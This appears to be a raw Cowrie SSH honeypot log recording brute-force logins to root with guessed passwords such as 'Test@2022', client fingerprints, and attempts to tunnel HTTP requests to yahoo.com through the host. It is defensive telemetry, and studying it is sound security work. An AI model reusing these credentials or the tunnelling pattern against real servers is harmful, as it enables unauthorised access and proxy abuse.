{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:58:00.606918Z","src_ip":"213.209.150.239","session":"ea5a77cac79b"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:58:00.841376Z","src_ip":"213.209.150.239","session":"ea5a77cac79b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":22339,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:22339","sensor":"my-vps","timestamp":"2025-08-26T00:58:00.890055Z","session":"ea5a77cac79b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:00.937177Z","src_ip":"213.209.150.239","session":"ea5a77cac79b"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T00:58:00.973336Z","src_ip":"27.112.78.170","session":"6ce5efc8a125"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":911,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:911","sensor":"my-vps","timestamp":"2025-08-26T00:58:01.073824Z","session":"ea5a77cac79b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:01.121129Z","src_ip":"213.209.150.239","session":"ea5a77cac79b"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:58:01.169228Z","src_ip":"213.209.150.239","session":"ea5a77cac79b"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":62612,"dst_ip":"1.2.3.4","dst_port":22,"session":"446d355904c1","protocol":"ssh","message":"New connection: 213.209.150.239:62612 (1.2.3.4:22) [session: 446d355904c1]","sensor":"my-vps","timestamp":"2025-08-26T00:58:01.215653Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:58:01.216968Z","src_ip":"213.209.150.239","session":"446d355904c1"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:58:01.263909Z","src_ip":"213.209.150.239","session":"446d355904c1"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:58:01.498909Z","src_ip":"213.209.150.239","session":"446d355904c1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":20430,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:20430","sensor":"my-vps","timestamp":"2025-08-26T00:58:01.546979Z","session":"446d355904c1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:01.594068Z","src_ip":"213.209.150.239","session":"446d355904c1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":21650,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:21650","sensor":"my-vps","timestamp":"2025-08-26T00:58:01.729837Z","session":"446d355904c1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:01.776899Z","src_ip":"213.209.150.239","session":"446d355904c1"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:58:01.826019Z","src_ip":"213.209.150.239","session":"446d355904c1"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":62659,"dst_ip":"1.2.3.4","dst_port":22,"session":"35296629b5db","protocol":"ssh","message":"New connection: 213.209.150.239:62659 (1.2.3.4:22) [session: 35296629b5db]","sensor":"my-vps","timestamp":"2025-08-26T00:58:01.881955Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:58:01.882846Z","src_ip":"213.209.150.239","session":"35296629b5db"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:58:01.939805Z","src_ip":"213.209.150.239","session":"35296629b5db"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:58:02.223102Z","src_ip":"213.209.150.239","session":"35296629b5db"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:58:02.236896Z","src_ip":"27.112.78.170","session":"6ce5efc8a125"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":6902,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:6902","sensor":"my-vps","timestamp":"2025-08-26T00:58:02.280931Z","session":"35296629b5db"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:02.338614Z","src_ip":"213.209.150.239","session":"35296629b5db"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":8325,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:8325","sensor":"my-vps","timestamp":"2025-08-26T00:58:02.495173Z","session":"35296629b5db"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.170","src_port":43652,"dst_ip":"1.2.3.4","dst_port":22,"session":"cce72a411b72","protocol":"ssh","message":"New connection: 27.112.78.170:43652 (1.2.3.4:22) [session: cce72a411b72]","sensor":"my-vps","timestamp":"2025-08-26T00:58:02.500207Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:58:02.501051Z","src_ip":"27.112.78.170","session":"cce72a411b72"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:02.552158Z","src_ip":"213.209.150.239","session":"35296629b5db"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:58:02.609546Z","src_ip":"213.209.150.239","session":"35296629b5db"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":62703,"dst_ip":"1.2.3.4","dst_port":22,"session":"532059be1f2f","protocol":"ssh","message":"New connection: 213.209.150.239:62703 (1.2.3.4:22) [session: 532059be1f2f]","sensor":"my-vps","timestamp":"2025-08-26T00:58:02.665307Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:58:02.666723Z","src_ip":"213.209.150.239","session":"532059be1f2f"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:58:02.723882Z","src_ip":"213.209.150.239","session":"532059be1f2f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:58:02.768047Z","src_ip":"27.112.78.170","session":"cce72a411b72"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:58:03.006730Z","src_ip":"213.209.150.239","session":"532059be1f2f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":30544,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:30544","sensor":"my-vps","timestamp":"2025-08-26T00:58:03.064990Z","session":"532059be1f2f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:03.122438Z","src_ip":"213.209.150.239","session":"532059be1f2f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":19387,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:19387","sensor":"my-vps","timestamp":"2025-08-26T00:58:03.279185Z","session":"532059be1f2f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:03.336144Z","src_ip":"213.209.150.239","session":"532059be1f2f"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:58:03.394053Z","src_ip":"213.209.150.239","session":"532059be1f2f"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":62753,"dst_ip":"1.2.3.4","dst_port":22,"session":"6dafc5cc71e5","protocol":"ssh","message":"New connection: 213.209.150.239:62753 (1.2.3.4:22) [session: 6dafc5cc71e5]","sensor":"my-vps","timestamp":"2025-08-26T00:58:03.439807Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:58:03.440739Z","src_ip":"213.209.150.239","session":"6dafc5cc71e5"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:58:03.487520Z","src_ip":"213.209.150.239","session":"6dafc5cc71e5"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:58:03.721341Z","src_ip":"213.209.150.239","session":"6dafc5cc71e5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":9686,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:9686","sensor":"my-vps","timestamp":"2025-08-26T00:58:03.769211Z","session":"6dafc5cc71e5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:03.817577Z","src_ip":"213.209.150.239","session":"6dafc5cc71e5"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:58:03.877250Z","src_ip":"27.112.78.170","session":"cce72a411b72"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":10798,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:10798","sensor":"my-vps","timestamp":"2025-08-26T00:58:03.953377Z","session":"6dafc5cc71e5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:04.000743Z","src_ip":"213.209.150.239","session":"6dafc5cc71e5"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:58:04.048747Z","src_ip":"213.209.150.239","session":"6dafc5cc71e5"}
